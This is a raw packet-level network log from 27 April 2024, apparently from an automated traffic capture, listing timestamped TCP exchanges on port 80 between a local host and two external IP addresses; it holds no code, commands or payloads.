                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.781384945 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782473087 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782511950 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782519102 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782551050 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782597065 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782598972 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782638073 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782676935 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782685041 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782715082 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782753944 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782758951 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782793999 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782831907 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782835960 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782870054 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.782910109 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.783101082 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.803225040 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.803267956 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.803313017 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.803345919 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.805322886 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.805382967 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.805705070 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.805747032 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.805763960 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.805816889 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806030989 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806080103 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806094885 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806126118 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806152105 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806200027 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806215048 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806246042 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806335926 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806375027 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806399107 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806428909 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806638002 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806696892 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806737900 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806787014 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806801081 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806839943 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806855917 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.806910038 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.824673891 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.824773073 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.833580017 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.877902985 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.878006935 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.924751043 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.973798990 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.973843098 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.973884106 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.973908901 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.973939896 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.973978043 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.973995924 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974015951 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974054098 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974057913 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974092960 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974138021 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974150896 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974188089 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974225998 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974225998 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974266052 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974303007 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974333048 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974339962 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974376917 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974402905 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974419117 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974442959 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974482059 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974519014 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974523067 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974556923 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974596024 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974601030 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974750996 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974793911 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.974805117 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975087881 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975126982 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975131989 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975255966 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975296021 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975301981 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975446939 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975486040 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975488901 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975524902 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975564003 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975567102 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975604057 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975646973 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975794077 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975831985 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975871086 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.975966930 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.976006985 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.976032972 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.976066113 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.976460934 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.976510048 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.976525068 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.976550102 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977137089 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977174997 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977200985 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977232933 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977289915 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977349997 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977365971 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977397919 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977421999 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977468014 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977483988 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977514982 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977540016 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977577925 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977622032 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977673054 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977710962 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977756023 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977771997 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977797031 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977818012 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977857113 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977881908 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977917910 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977955103 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977956057 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.977993965 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978032112 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978037119 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978080988 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978096008 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978127003 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978153944 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978190899 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978235960 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978250980 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978279114 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978285074 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978323936 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.978367090 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.018955946 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.018991947 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.019049883 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.073323965 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.120349884 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.120428085 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.146646976 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.146744967 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.147775888 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.147882938 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.148143053 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.148185968 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.148210049 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.148236036 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.149143934 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.149183035 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.149205923 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.149233103 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.149966955 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150036097 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150058031 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150094986 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150130987 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150152922 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150187969 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150243044 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150278091 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150326014 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150341988 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150374889 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150432110 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150480986 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150509119 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.150561094 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169464111 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169688940 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169728994 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169748068 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169768095 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169805050 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169811010 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169842958 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169882059 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169888020 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169924021 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169961929 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.169964075 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170001030 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170038939 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170043945 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170078039 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170114040 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170121908 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170151949 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170190096 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170200109 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170243025 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170279980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170285940 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170320034 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170356989 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170361996 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170396090 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170433044 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170434952 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170471907 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170509100 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170511961 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170562983 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170603037 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170609951 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170648098 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170684099 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170686960 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170723915 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170762062 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170768023 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170799971 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170838118 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170841932 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170876980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170917034 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170922041 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170955896 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.170996904 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173249006 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173288107 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173326969 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173338890 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173367023 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173408985 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173439980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173477888 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173516035 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173518896 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173556089 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173593998 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173602104 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173667908 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173707008 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173711061 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173747063 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.173789978 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.214482069 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.214549065 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.214601040 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.315520048 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.315581083 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.315623999 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.315625906 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.317315102 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.317353964 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.317385912 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.317416906 CEST4973380192.168.2.4185.172.128.76
